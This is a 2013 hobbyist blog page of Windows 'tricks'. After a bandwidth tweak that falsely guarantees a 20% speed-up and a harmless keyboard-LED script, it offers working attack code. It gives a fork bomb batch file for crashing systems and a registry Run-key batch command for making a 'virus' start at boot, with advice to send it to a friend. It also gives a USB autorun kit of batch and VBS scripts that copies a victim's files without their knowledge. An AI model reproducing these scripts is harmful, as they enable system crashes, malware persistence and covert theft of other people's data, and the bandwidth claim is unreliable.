This blog is officialy managed by Shahnawaz Alam. You can get here amazing collections of information which you have never ever seen, heard and experienced before

Wednesday 8 May 2013

INCREASE YOUR BROADBAND SPEED

03:46 Posted by Unknown , No comments
                       Increase Your Broadband Speed!!

This is a way To Increase your Broad band speed in windows enabled system .
I guarantee this will increase your speed up to 20% :-)

So How is this working ?, Windows and its services already reserved a quota of 20% of the total

bandwidth for their update futures.

So as default this is recommended as 20.. so just change it to 0 thats all..
a step by step proces will given below how to do this ..

Go to Run and type GPEDIT.MSC so You have a window of Group policy like in the pic...

Go to Administrative templates ->>>> Network>>>>>>QoS packet scheduler

and In the "limit Reservable Bandwidth "

By Default it is Shown As Not configured Change Them To Enable And put The Value TO "0"

MAKE YOUR KEYBOARD LIGHTS ACT AS A DISCO LIGHT

03:39 Posted by Unknown , , No comments
You can make your keyboard lights as a disco lights by the following steps:

1.Open notepad.You can open notepad by doing a right click on your desktop and then new->text document.

2.Copy and paste the code below into the notepad

Set wshShell =wscript.CreateObject("WScript.Shell")
 do
 wscript.sleep 100
 wshshell.sendkeys "{CAPSLOCK}"
 wshshell.sendkeys "{NUMLOCK}"
 wshshell.sendkeys "{SCROLLLOCK}"
 loop

3.Save the file with name disco.vbs

4.Double click on the saved file and your keyboard Led’s will start blinking like disco lights.

5.To stop the disco lights open task manager.You can open task manager by doing a right click on your taskbar and then selecting task manager.

 6.Now locate wscript.exe and select it.Click on “ End Process “.

CRASH A SYSTEM

03:36 Posted by Unknown , , No comments
Here is a short article about fork bomb by Shahnawaz Alam.
Fork bomb for crashing system is a smallest writable virus as it contains on 5 Characters. Fork bombs count as wabbits: they typically do not spread as worms or viruses.

The concept behind the fork bomb: the processes recursively fork until a denial of service or a crash occurs. Fork Bomb creates a large number of processes very quickly and break the limitation of processes that can run on a system. It's dead simple: A program just replicate itself, which again replicate itself and so on until all resources are exhausted.


A fork bomb generally creates two instances at startup, further each of created processes creates two instances and so on…The processes recursively fork; this “forks” the processor and jamm it completely until a crash occurs. It use forks to do system crash, so its called Fork Bomb

See, How to create it:


1. Fork Bomb for windows:
Write the following code in notepad and save it with *.bat* extension say Shahnawaz.bat

%0|%0

Once anyone will do double click on this bat file, his system will jamm.

CREATING VIRUSES WITHIN MINUTES

03:31 Posted by Unknown , No comments
Hello guys,

You must be familiar with viruses and probably you must be knowing how we can create them. Once

the virus get executed it will show its impact but it will last till the system is turn on, If

you will turn off the system all the process of the virus will also get killed.

So our requirement is to run our virus again even if the system get rebooted. So for that we

will have to send our virus on start up. But we don’t want to send it manually instead of that

we would like to send it with the help of batch file.

So let us take we are having a virus demo.exe.

Follow the following steps for sending it on Start up.

1. Open a Notepad file

2. Write down the following command

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v demo /t REG_SZ /d demo.exe

3. Now save the notepad file with any name say Shahnawaz but extension should be *.bat*. Means

we will have to create a batch file eg: Shahnawaz.bat

4. Now send Shahnawaz.bat along with demo.exe virus to your friend. Whenever he will click on

Shahnawaz.bat file automatically demo.exe will reach at the start up.

5. Now the impact of the virus will also be visible after the restart of the system.

COPY ANY DATA OR INFORMATION FROM ANY COMPUTER INVISIBLY

03:26 Posted by Unknown , No comments
Did you wants to copy any data or information from any computer in your storage media ( Pen Drives ) without informing to other so lets get ready. Here is a Trick by Shahnawaz Alam which can help you to Copy and Steal all the Secret Data or Files from the Victims Computer by just plugging the USB or Pendrive to the Computer.

This Trick could prove to be very helpful and it would Copy and Steal all the Data without the Confirmation and Knowing of Computer Owner.

To use this Trick just follow these simple Steps :

1) Open Notepad.

2) Copy and Paste the following Code into Notepad :

[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat

3) Save this file as autorun.inf.

4) Open Notepad again.

5) Copy and Paste the following Code :

@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\Data\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\Data\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\Data\vids"
@echo off
cls

6) Save this file as File.bat.

7) Open Notepad again.

8) Copy and Paste the following Code :

CreateObject("Wscript.Shell").
Run """" & WScript.Arguments(0) & """", 0, False

9) Save this file as Invisible.vbs.

10) Now again open Notepad.

11) Now Copy and Paste the following Code :

wscript.exe \invisible.vbs file.bat

12) Save this as Launch.bat.

13) Now Copy and Paste all the four (4) files created in the above steps to the USB or Pendrive.

14) Create a folder named “Data” where the Stolen contents would be Copied automatically.

15) Now it is done. The USB or Pendrive is ready to Steal the Secret Data or Files.